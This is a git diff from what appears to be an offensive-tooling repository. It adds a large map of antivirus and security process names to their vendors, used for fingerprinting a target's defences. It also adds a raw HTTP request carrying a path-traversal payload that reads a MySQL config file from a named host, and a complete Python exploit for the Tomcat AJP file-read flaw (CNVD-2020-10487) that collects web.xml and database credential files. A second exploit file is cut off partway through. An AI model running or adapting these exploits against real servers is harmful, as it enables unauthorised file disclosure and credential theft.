"McAfee", +"avgcc32.exe": "AVG", +"avgctrl.exe": "AVG", +"avgemc.exe": "AVG", +"avgrsx.exe": "AVG", +"avgserv.exe": "AVG", +"avgserv9.exe": "AVG", +"avgw.exe": "AVG", +"avkpop.exe": "G DATA SOFTWARE AG", +"avkserv.exe": "G DATA SOFTWARE AG", +"avkservice.exe": "G DATA SOFTWARE AG", +"avkwctl9.exe": "G DATA SOFTWARE AG", +"avltmain.exe": "Panda Software Aplication", +"avnt.exe": "H+BEDV Datentechnik GmbH", +"avp32.exe": "Kaspersky Anti-Virus", +"avpcc.exe": " Kaspersky AntiVirus", +"avpdos32.exe": " Kaspersky AntiVirus", +"avpm.exe": " Kaspersky AntiVirus", +"avptc32.exe": " Kaspersky AntiVirus", +"avpupd.exe": " Kaspersky AntiVirus", +"avsynmgr.exe": "McAfee", +"avwin.exe": " H+BEDV", +"bargains.exe": "Exact Advertising SpyWare", +"beagle.exe": "Avast", +"blackd.exe": "BlackICE", +"blackice.exe": "BlackICE", +"blink.exe": "micromedia", +"blss.exe": "CBlaster", +"bootwarn.exe": "Symantec", +"bpc.exe": "Grokster", +"brasil.exe": "Exact Advertising", +"ccevtmgr.exe": "Norton Internet Security", +"cdp.exe": "CyberLink Corp.", +"cfd.exe": "Motive Communications", +"cfgwiz.exe": " Norton AntiVirus", +"claw95.exe": "已知杀软进程,名称暂未收录", +"claw95cf.exe": "已知杀软进程,名称暂未收录", +"clean.exe": "windows流氓软件清理大师", +"cleaner.exe": "windows流氓软件清理大师", +"cleaner3.exe": "windows流氓软件清理大师", +"cleanpc.exe": "windows流氓软件清理大师", +"cpd.exe": "McAfee", +"ctrl.exe": "已知杀软进程,名称暂未收录", +"cv.exe": "已知杀软进程,名称暂未收录", +"defalert.exe": "Symantec", +"defscangui.exe": "Symantec", +"defwatch.exe": "Norton Antivirus", +"doors.exe": "已知杀软进程,名称暂未收录", +"dpf.exe": "已知杀软进程,名称暂未收录", +"dpps2.exe": "PanicWare", +"dssagent.exe": "Broderbund", +"ecengine.exe": "已知杀软进程,名称暂未收录", +"emsw.exe": "Alset Inc", +"ent.exe": "已知杀软进程,名称暂未收录", +"espwatch.exe": "已知杀软进程,名称暂未收录", +"ethereal.exe": "RationalClearCase", +"exe.avxw.exe": "已知杀软进程,名称暂未收录", +"expert.exe": "已知杀软进程,名称暂未收录", +"f-prot95.exe": "已知杀软进程,名称暂未收录", +"fameh32.exe": "F-Secure", +"fast.exe": " FastUsr", +"fch32.exe": "F-Secure", +"fih32.exe": "F-Secure", +"findviru.exe": "F-Secure", +"firewall.exe": "AshampooSoftware", +"fnrb32.exe": "F-Secure", +"fp-win.exe": " F-Prot Antivirus OnDemand", +"fsaa.exe": "F-Secure", +"fsav.exe": "F-Secure", +"fsav32.exe": "F-Secure", +"fsav530stbyb.exe": "F-Secure", +"fsav530wtbyb.exe": "F-Secure", +"fsav95.exe": "F-Secure", +"fsgk32.exe": "F-Secure", +"fsm32.exe": "F-Secure", +"fsma32.exe": "F-Secure", +"fsmb32.exe": "F-Secure", +"gbmenu.exe": "已知杀软进程,名称暂未收录", +"guard.exe": "ewido", +"guarddog.exe": "ewido", +"htlog.exe": "已知杀软进程,名称暂未收录", +"htpatch.exe": "Silicon Integrated Systems Corporation", +"hwpe.exe": "已知杀软进程,名称暂未收录", +"iamapp.exe": "Symantec", +"iamserv.exe": "Symantec", +"iamstats.exe": "Symantec", +"iedriver.exe": " Urlblaze.com", +"iface.exe": "Panda Antivirus Module", +"infus.exe": "Infus Dialer", +"infwin.exe": "Msviewparasite", +"intdel.exe": "Inet Delivery", +"intren.exe": "已知杀软进程,名称暂未收录", +"jammer.exe": "已知杀软进程,名称暂未收录", +"kavpf.exe": "Kapersky", +"kazza.exe": "Kapersky", +"keenvalue.exe": "EUNIVERSE INC", +"launcher.exe": "Intercort Systems", +"ldpro.exe": "已知杀软进程,名称暂未收录", +"ldscan.exe": "Windows Trojans Inspector", +"localnet.exe": "已知杀软进程,名称暂未收录", +"luall.exe": "Symantec", +"luau.exe": "Symantec", +"lucomserver.exe": "Norton", +"mcagent.exe": "McAfee", +"mcmnhdlr.exe": "McAfee", +"mctool.exe": "McAfee", +"mcupdate.exe": "McAfee", +"mcvsrte.exe": "McAfee", +"mcvsshld.exe": "McAfee", +"mfin32.exe": "MyFreeInternetUpdate", +"mfw2en.exe": "MyFreeInternetUpdate", +"mfweng3.02d30.exe": "MyFreeInternetUpdate", +"mgavrtcl.exe": "McAfee", +"mgavrte.exe": "McAfee", +"mghtml.exe": "McAfee", +"mgui.exe": "BullGuard", +"minilog.exe": "Zone Labs Inc", +"mmod.exe": "EzulaInc", +"mostat.exe": "WurldMediaInc", +"mpfagent.exe": "McAfee", +"mpfservice.exe": "McAfee", +"mpftray.exe": "McAfee", +"mscache.exe": "Integrated Search Technologies Spyware", +"mscman.exe": "OdysseusMarketingInc", +"msmgt.exe": "Total Velocity Spyware", +"msvxd.exe": "W32/Datom-A", +"mwatch.exe": "已知杀软进程,名称暂未收录", +"nav.exe": "Reuters Limited", +"navapsvc.exe": "Norton AntiVirus", +"navapw32.exe": "Norton AntiVirus", +"navw32.exe": "Norton Antivirus", +"ndd32.exe": "诺顿磁盘医生", +"neowatchlog.exe": "已知杀软进程,名称暂未收录", +"netutils.exe": "已知杀软进程,名称暂未收录", +"nisserv.exe": "Norton", +"nisum.exe": "Norton", +"nmain.exe": "Norton", +"nod32.exe": "ESET Smart Security", +"norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录", +"notstart.exe": "已知杀软进程,名称暂未收录", +"nprotect.exe": "Symantec", +"npscheck.exe": "Norton", +"npssvc.exe": "Norton", +"ntrtscan.exe": "趋势反病毒应用程序", +"nui.exe": "已知杀软进程,名称暂未收录", +"otfix.exe": "已知杀软进程,名称暂未收录", +"outpostinstall.exe": "Outpost", +"patch.exe": "趋势科技", +"pavw.exe": "已知杀软进程,名称暂未收录", +"pcscan.exe": "趋势科技", +"pdsetup.exe": "已知杀软进程,名称暂未收录", +"persfw.exe": "Tiny Personal Firewall", +"pgmonitr.exe": "PromulGate SpyWare", +"pingscan.exe": "已知杀软进程,名称暂未收录", +"platin.exe": "已知杀软进程,名称暂未收录", +"pop3trap.exe": "PC-cillin", +"poproxy.exe": "NortonAntiVirus", +"popscan.exe": "已知杀软进程,名称暂未收录", +"powerscan.exe": "Integrated Search Technologies", +"ppinupdt.exe": "已知杀软进程,名称暂未收录", +"pptbc.exe": "已知杀软进程,名称暂未收录", +"ppvstop.exe": "已知杀软进程,名称暂未收录", +"prizesurfer.exe": "Prizesurfer", +"prmt.exe": "OpiStat", +"prmvr.exe": "Adtomi", +"processmonitor.exe": "Sysinternals", +"proport.exe": "已知杀软进程,名称暂未收录", +"protectx.exe": "ProtectX", +"pspf.exe": "已知杀软进程,名称暂未收录", +"purge.exe": "已知杀软进程,名称暂未收录", +"qconsole.exe": "Norton AntiVirus Quarantine Console", +"qserver.exe": "Norton Internet Security", +"rapapp.exe": "BlackICE", +"rb32.exe": "RapidBlaster", +"rcsync.exe": "PrizeSurfer", +"realmon.exe": "Realmon ", +"rescue.exe": "已知杀软进程,名称暂未收录", +"rescue32.exe": "卡巴斯基互联网安全套装", +"rshell.exe": "已知杀软进程,名称暂未收录", +"rtvscn95.exe": "Real-time virus scanner ", +"rulaunch.exe": "McAfee User Interface", +"run32dll.exe": "PAL PC Spy", +"safeweb.exe": "PSafe Tecnologia", +"sbserv.exe": "Norton Antivirus", +"scrscan.exe": "360杀毒", +"sfc.exe": "System file checker", +"sh.exe": "MKS Toolkit for Win3", +"showbehind.exe": "MicroSmarts Enterprise Component ", +"soap.exe": "System Soap Pro", +"sofi.exe": "已知杀软进程,名称暂未收录", +"sperm.exe": "已知杀软进程,名称暂未收录", +"supporter5.exe": "eScorcher反病毒", +"symproxysvc.exe": "Symantec", +"symtray.exe": "Symantec", +"tbscan.exe": "ThunderBYTE", +"tc.exe": "TimeCalende", +"titanin.exe": "TitanHide", +"tvmd.exe": "Total Velocity", +"tvtmd.exe": " Total Velocity", +"vettray.exe": "eTrust", +"vir-help.exe": "已知杀软进程,名称暂未收录", +"vnpc3000.exe": "已知杀软进程,名称暂未收录", +"vpc32.exe": "Symantec", +"vpc42.exe": "Symantec", +"vshwin32.exe": "McAfee", +"vsmain.exe": "McAfee", +"vsstat.exe": "McAfee", +"wfindv32.exe": "已知杀软进程,名称暂未收录", +"zapro.exe": "Zone Alarm", +"zonealarm.exe": "Zone Alarm", +"AVPM.exe": "Kaspersky", +"A2CMD.exe": "Emsisoft Anti-Malware", +"A2SERVICE.exe": "a-squared free", +"A2FREE.exe": "a-squared Free", +"ADVCHK.exe": "Norton AntiVirus", +"AGB.exe": "安天防线", +"AHPROCMONSERVER.exe": "安天防线", +"AIRDEFENSE.exe": "AirDefense", +"ALERTSVC.exe": "Norton AntiVirus", +"AVIRA.exe": "小红伞杀毒", +"AMON.exe": "Tiny Personal Firewall", +"AVZ.exe": "AVZ", +"ANTIVIR.exe": "已知杀软进程,名称暂未收录", +"APVXDWIN.exe": "熊猫卫士", +"ASHMAISV.exe": "Alwil", +"ASHSERV.exe": "Avast Anti-virus", +"ASHSIMPL.exe": "AVAST!VirusCleaner", +"ASHWEBSV.exe": "Avast", +"ASWUPDSV.exe": "Avast", +"ASWSCAN.exe": "Avast", +"AVCIMAN.exe": "熊猫卫士", +"AVCONSOL.exe": "McAfee", +"AVENGINE.exe": "熊猫卫士", +"AVESVC.exe": "Avira AntiVir Security Service", +"AVEVL32.exe": "已知杀软进程,名称暂未收录", +"AVGAM.exe": "AVG", +"AVGCC.exe": "AVG", +"AVGCHSVX.exe": "AVG", +"AVGCSRVX": "AVG", +"AVGNSX.exe": "AVG", +"AVGCC32.exe": "AVG", +"AVGCTRL.exe": "AVG", +"AVGEMC.exe": "AVG", +"AVGFWSRV.exe": "AVG", +"AVGNTMGR.exe": "AVG", +"AVGSERV.exe": "AVG", +"AVGTRAY.exe": "AVG", +"AVGUPSVC.exe": "AVG", +"AVINITNT.exe": "Command AntiVirus for NT Server", +"AVPCC.exe": "Kaspersky", +"AVSERVER.exe": "Kerio MailServer", +"AVSCHED32.exe": "H+BEDV", +"AVSYNMGR.exe": "McAfee", +"AVWUPSRV.exe": "H+BEDV", +"BDSWITCH.exe": "BitDefender Module", +"BLACKD.exe": "BlackICE", +"CCEVTMGR.exe": "Symantec", +"CFP.exe": "COMODO", +"CLAMWIN.exe": "ClamWin Portable", +"CUREIT.exe": "DrWeb CureIT", +"DEFWATCH.exe": "Norton Antivirus", +"DRWADINS.exe": "Dr.Web", +"DRWEB.exe": "Dr.Web", +"DEFENDERDAEMON.exe": "ShadowDefender", +"EWIDOCTRL.exe": "Ewido Security Suite", +"EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus", +"FIREWALL.exe": "AshampooSoftware", +"FPROTTRAY.exe": "F-PROT Antivirus", +"FPWIN.exe": "Verizon", +"FRESHCLAM.exe": "ClamAV", +"FSAV32.exe": "F-Secure", +"FSBWSYS.exe": "F-secure", +"FSDFWD.exe": "F-Secure", +"FSGK32.exe": "F-Secure", +"FSGK32ST.exe": "F-Secure", +"FSMA32.exe": "F-Secure", +"FSMB32.exe": "F-Secure", +"FSSM32.exe": "F-Secure", +"GUARDGUI.exe": "网游保镖", +"GUARDNT.exe": "IKARUS", +"IAMAPP.exe": "Symantec", +"INOCIT.exe": "eTrust", +"INORPC.exe": "eTrust", +"INORT.exe": "eTrust", +"INOTASK.exe": "eTrust", +"INOUPTNG.exe": "eTrust", +"ISAFE.exe": "eTrust", +"KAV.exe": "Kaspersky", +"KAVMM.exe": "Kaspersky", +"KAVPF.exe": "Kaspersky", +"KAVPFW.exe": "Kaspersky", +"KAVSTART.exe": "Kaspersky", +"KAVSVC.exe": "Kaspersky", +"KAVSVCUI.exe": "Kaspersky", +"KMAILMON.exe": "金山毒霸", +"MCAGENT.exe": "McAfee", +"MCMNHDLR.exe": "McAfee", +"MCREGWIZ.exe": "McAfee", +"MCUPDATE.exe": "McAfee", +"MCVSSHLD.exe": "McAfee", +"MINILOG.exe": "Zone Alarm", +"MYAGTSVC.exe": "McAfee", +"MYAGTTRY.exe": "McAfee", +"NAVAPSVC.exe": "Norton", +"NAVAPW32.exe": "Norton", +"NAVLU32.exe": "Norton", +"NAVW32.exe": "Norton Antivirus", +"NEOWATCHLOG.exe": "NeoWatch", +"NEOWATCHTRAY.exe": "NeoWatch", +"NISSERV.exe": "Norton", +"NISUM.exe": "Norton", +"NMAIN.exe": "Norton", +"NOD32.exe": "ESET NOD32", +"NPFMSG.exe": "Norman个人防火墙", +"NPROTECT.exe": "Symantec", +"NSMDTR.exe": "Norton", +"NTRTSCAN.exe": "趋势科技", +"OFCPFWSVC.exe": "OfficeScanNT", +"ONLINENT.exe": "已知杀软进程,名称暂未收录", +"OP_MON.exe": " OutpostFirewall", +"PAVFIRES.exe": "熊猫卫士", +"PAVFNSVR.exe": "熊猫卫士", +"PAVKRE.exe": "熊猫卫士", +"PAVPROT.exe": "熊猫卫士", +"PAVPROXY.exe": "熊猫卫士", +"PAVPRSRV.exe": "熊猫卫士", +"PAVSRV51.exe": "熊猫卫士", +"PAVSS.exe": "熊猫卫士", +"PCCGUIDE.exe": "PC-cillin", +"PCCIOMON.exe": "PC-cillin", +"PCCNTMON.exe": "PC-cillin", +"PCCPFW.exe": "趋势科技", +"PCCTLCOM.exe": "趋势科技", +"PCTAV.exe": "PC Tools AntiVirus", +"PERSFW.exe": "Tiny Personal Firewall", +"PERVAC.exe": "已知杀软进程,名称暂未收录", +"PESTPATROL.exe": "Ikarus", +"PREVSRV.exe": "熊猫卫士", +"RTVSCN95.exe": "Real-time Virus Scanner", +"SAVADMINSERVICE.exe": "SAV", +"SAVMAIN.exe": "SAV", +"SAVSCAN.exe": "SAV", +"SDHELP.exe": "Spyware Doctor", +"SHSTAT.exe": "McAfee", +"SPBBCSVC.exe": "Symantec", +"SPIDERCPL.exe": "Dr.Web", +"SPIDERML.exe": "Dr.Web", +"SPIDERUI.exe": "Dr.Web", +"SPYBOTSD.exe": "Spybot ", +"SWAGENT.exe": "SonicWALL", +"SWDOCTOR.exe": "SonicWALL", +"SWNETSUP.exe": "Sophos", +"SYMLCSVC.exe": "Symantec", +"SYMPROXYSVC.exe": "Symantec", +"SYMSPORT.exe": "Sysmantec", +"SYMWSC.exe": "Sysmantec", +"SYNMGR.exe": "Sysmantec", +"TMLISTEN.exe": "趋势科技", +"TMNTSRV.exe": "趋势科技", +"TMPROXY.exe": "趋势科技", +"TNBUTIL.exe": "Anti-Virus", +"VBA32ECM.exe": "已知杀软进程,名称暂未收录", +"VBA32IFS.exe": "已知杀软进程,名称暂未收录", +"VBA32PP3.exe": "已知杀软进程,名称暂未收录", +"VCRMON.exe": "VirusChaser", +"VRMONNT.exe": "HAURI", +"VRMONSVC.exe": "HAURI", +"VSHWIN32.exe": "McAfee", +"VSSTAT.exe": "McAfee", +"XCOMMSVR.exe": "BitDefender", +"ZONEALARM.exe": "Zone Alarm", +"360rp.exe": "360杀毒", +"afwServ.exe": " Avast Antivirus ", +"safeboxTray.exe": "360杀毒", +"360safebox.exe": "360杀毒", +"QQPCTray.exe": "QQ电脑管家", +"KSafeTray.exe": "金山毒霸", +"KSafeSvc.exe": "金山毒霸", +"KWatch.exe": "金山毒霸", +"gov_defence_service.exe": "云锁", +"gov_defence_daemon.exe": "云锁", +"smartscreen.exe": "Windows Defender", +"SunloginClient.exe": "向日葵", +"finalshell.exe": "finalshell终端管理" \ No newline at end of file diff --git a/property/test.txt b/property/test.txt new file mode 100644 index 0000000..4249097 --- /dev/null +++ b/property/test.txt @@ -0,0 +1,10 @@ +POST /mac/gateway.php HTTP/1.1 +Host: q.leoei.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 43 +Charset: utf-8 +Content-Type: application/x-www-form-urlencoded +Referer: https://servicewechat.com/wxe1d5f6d5f6c6a21f/5/page-frame.html +Accept-Encoding: gzip + +json={"url":"/general/../../mysql5/my.ini"} \ No newline at end of file diff --git a/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py b/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py new file mode 100644 index 0000000..8defb30 --- /dev/null +++ b/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py @@ -0,0 +1,326 @@ +######f0ng######usage:ip -p port +# -*- coding: utf-8 -*- + +#CNVD-2020-10487 Tomcat-Ajp lfi + +import struct + +# Some references: +# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html +def pack_string(s): + if s is None: + return struct.pack(">h", -1) + l = len(s) + return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) +def unpack(stream, fmt): + size = struct.calcsize(fmt) + buf = stream.read(size) + return struct.unpack(fmt, buf) +def unpack_string(stream): + size, = unpack(stream, ">h") + if size == -1: # null string + return None + res, = unpack(stream, "%ds" % size) + stream.read(1) # \0 + return res +class NotFoundException(Exception): + pass +class AjpBodyRequest(object): + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + MAX_REQUEST_LENGTH = 8186 + def __init__(self, data_stream, data_len, data_direction=None): + self.data_stream = data_stream + self.data_len = data_len + self.data_direction = data_direction + def serialize(self): + data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) + if len(data) == 0: + return struct.pack(">bbH", 0x12, 0x34, 0x00) + else: + res = struct.pack(">H", len(data)) + res += data + if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbH", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbH", 0x41, 0x42, len(res)) + return header + res + def send_and_receive(self, socket, stream): + while True: + data = self.serialize() + socket.send(data) + r = AjpResponse.receive(stream) + while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: + r = AjpResponse.receive(stream) + + if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: + break +class AjpForwardRequest(object): + _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28) + REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + COMMON_HEADERS = ["SC_REQ_ACCEPT", + "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION", + "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2", + "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" + ] + ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] + def __init__(self, data_direction=None): + self.prefix_code = 0x02 + self.method = None + self.protocol = None + self.req_uri = None + self.remote_addr = None + self.remote_host = None + self.server_name = None + self.server_port = None + self.is_ssl = None + self.num_headers = None + self.request_headers = None + self.attributes = None + self.data_direction = data_direction + def pack_headers(self): + self.num_headers = len(self.request_headers) + res = "" + res = struct.pack(">h", self.num_headers) + for h_name in self.request_headers: + if h_name.startswith("SC_REQ"): + code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 + res += struct.pack("BB", 0xA0, code) + else: + res += pack_string(h_name) + + res += pack_string(self.request_headers[h_name]) + return res + + def pack_attributes(self): + res = b"" + for attr in self.attributes: + a_name = attr['name'] + code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 + res += struct.pack("b", code) + if a_name == "req_attribute": + aa_name, a_value = attr['value'] + res += pack_string(aa_name) + res += pack_string(a_value) + else: + res += pack_string(attr['value']) + res += struct.pack("B", 0xFF) + return res + def serialize(self): + res = "" + res = struct.pack("bb", self.prefix_code, self.method) + res += pack_string(self.protocol) + res += pack_string(self.req_uri) + res += pack_string(self.remote_addr) + res += pack_string(self.remote_host) + res += pack_string(self.server_name) + res += struct.pack(">h", self.server_port) + res += struct.pack("?", self.is_ssl) + res += self.pack_headers() + res += self.pack_attributes() + if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbh", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbh", 0x41, 0x42, len(res)) + return header + res + def parse(self, raw_packet): + stream = StringIO(raw_packet) + self.magic1, self.magic2, data_len = unpack(stream, "bbH") + self.prefix_code, self.method = unpack(stream, "bb") + self.protocol = unpack_string(stream) + self.req_uri = unpack_string(stream) + self.remote_addr = unpack_string(stream) + self.remote_host = unpack_string(stream) + self.server_name = unpack_string(stream) + self.server_port = unpack(stream, ">h") + self.is_ssl = unpack(stream, "?") + self.num_headers, = unpack(stream, ">H") + self.request_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code > 0xA000: + h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] + else: + h_name = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + self.request_headers[h_name] = h_value + def send_and_receive(self, socket, stream, save_cookies=False): + res = [] + i = socket.sendall(self.serialize()) + if self.method == AjpForwardRequest.POST: + return res + + r = AjpResponse.receive(stream) + assert r.prefix_code == AjpResponse.SEND_HEADERS + res.append(r) + if save_cookies and 'Set-Cookie' in r.response_headers: + self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] + + # read body chunks and end response packets + while True: + r = AjpResponse.receive(stream) + res.append(r) + if r.prefix_code == AjpResponse.END_RESPONSE: + break + elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: + continue + else: + raise NotImplementedError + break + + return res + +class AjpResponse(object): + _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) + COMMON_SEND_HEADERS = [ + "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", + "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" + ] + def parse(self, stream): + # read headers + self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") + + if self.prefix_code == AjpResponse.SEND_HEADERS: + self.parse_send_headers(stream) + elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: + self.parse_send_body_chunk(stream) + elif self.prefix_code == AjpResponse.END_RESPONSE: + self.parse_end_response(stream) + elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: + self.parse_get_body_chunk(stream) + else: + raise NotImplementedError + + def parse_send_headers(self, stream): + self.http_status_code, = unpack(stream, ">H") + self.http_status_msg = unpack_string(stream) + self.num_headers, = unpack(stream, ">H") + self.response_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code <= 0xA000: # custom header + h_name, = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + else: + h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001] + h_value = unpack_string(stream) + self.response_headers[h_name] = h_value + + def parse_send_body_chunk(self, stream): + self.data_length, = unpack(stream, ">H") + self.data = stream.read(self.data_length+1) + + def parse_end_response(self, stream): + self.reuse, = unpack(stream, "b") + + def parse_get_body_chunk(self, stream): + rlen, = unpack(stream, ">H") + return rlen + + @staticmethod + def receive(stream): + r = AjpResponse() + r.parse(stream) + return r + +import socket + +def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): + fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) + fr.method = method + fr.protocol = "HTTP/1.1" + fr.req_uri = req_uri + fr.remote_addr = target_host + fr.remote_host = None + fr.server_name = target_host + fr.server_port = 80 + fr.request_headers = { + 'SC_REQ_ACCEPT': 'text/html', + 'SC_REQ_CONNECTION': 'keep-alive', + 'SC_REQ_CONTENT_LENGTH': '0', + 'SC_REQ_HOST': target_host, + 'SC_REQ_USER_AGENT': 'Mozilla', + 'Accept-Encoding': 'gzip, deflate, sdch', + 'Accept-Language': 'en-US,en;q=0.5', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' + } + fr.is_ssl = False + fr.attributes = [] + return fr + +class Tomcat(object): + def __init__(self, target_host, target_port): + self.target_host = target_host + self.target_port = target_port + + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.socket.connect((target_host, target_port)) + self.stream = self.socket.makefile("rb", bufsize=0) + + def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) + print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + if user is not None and password is not None: + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '') + for h in headers: + self.forward_request.request_headers[h] = headers[h] + for a in attributes: + self.forward_request.attributes.append(a) + responses = self.forward_request.send_and_receive(self.socket, self.stream) + if len(responses) == 0: + return None, None + snd_hdrs_res = responses[0] + data_res = responses[1:-1] + if len(data_res) == 0: + print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers) + return snd_hdrs_res, data_res + +''' +javax.servlet.include.request_uri +javax.servlet.include.path_info +javax.servlet.include.servlet_path +''' + +import argparse +parser = argparse.ArgumentParser() +parser.add_argument("target", type=str, help="Hostname or IP to attack") +parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)") +parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)") +args = parser.parse_args() +t = Tomcat(args.target, args.port) + +_,data = t.perform_request('/asdf',attributes=[ + {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, + {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]}, + {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, + ]) +print('----------------------------') +print("".join([d.data for d in data])) + +if "WEB-INF" in "".join([d.data for d in data]): + print("**********************注意可能有WEB-INF配置文件*************************") + +words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties', +'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',] + +for word in words_list: + + print(":::::::::" + word + ":::::::::") + + _,data = t.perform_request('/asdf',attributes=[ + {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, + {'name':'req_attribute','value':['javax.servlet.include.path_info',word]}, + {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, + ]) + print('----------------------------') + if "Error report" in "".join([d.data for d in data]): + pass + else: + print("".join([d.data for d in data])) diff --git a/pythonexp/Tomcat/CNVD-2020-10487-pro.py b/pythonexp/Tomcat/CNVD-2020-10487-pro.py new file mode 100644 index 0000000..c67ba88 --- /dev/null +++ b/pythonexp/Tomcat/CNVD-2020-10487-pro.py @@ -0,0 +1,363 @@ +######f0ng######usage:ip -p port +# -*- coding:utf-8 -*- +# +# Julien Legras - Synacktiv +# +# THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY +# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException +from pprint import pprint, pformat + +import socket +import argparse +import logging +import re +import os +from StringIO import StringIO +import logging +from colorlog import ColoredFormatter +from urllib import unquote + + +def setup_logger(): + """Return a logger with a default ColoredFormatter.""" + formatter = ColoredFormatter( + "[%(asctime)s.%(msecs)03d] %(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s", + datefmt="%Y-%m-%d %H:%M:%S", + reset=True, + log_colors={ + 'DEBUG': 'bold_purple', + 'INFO': 'bold_green', + 'WARNING': 'bold_yellow', + 'ERROR': 'bold_red', + 'CRITICAL': 'bold_red', + } + ) + + logger = logging.getLogger('meow') + handler = logging.StreamHandler() + handler.setFormatter(formatter) + logger.addHandler(handler) + logger.setLevel(logging.DEBUG) + + return logger + + +logger = setup_logger() + + +# helpers +def 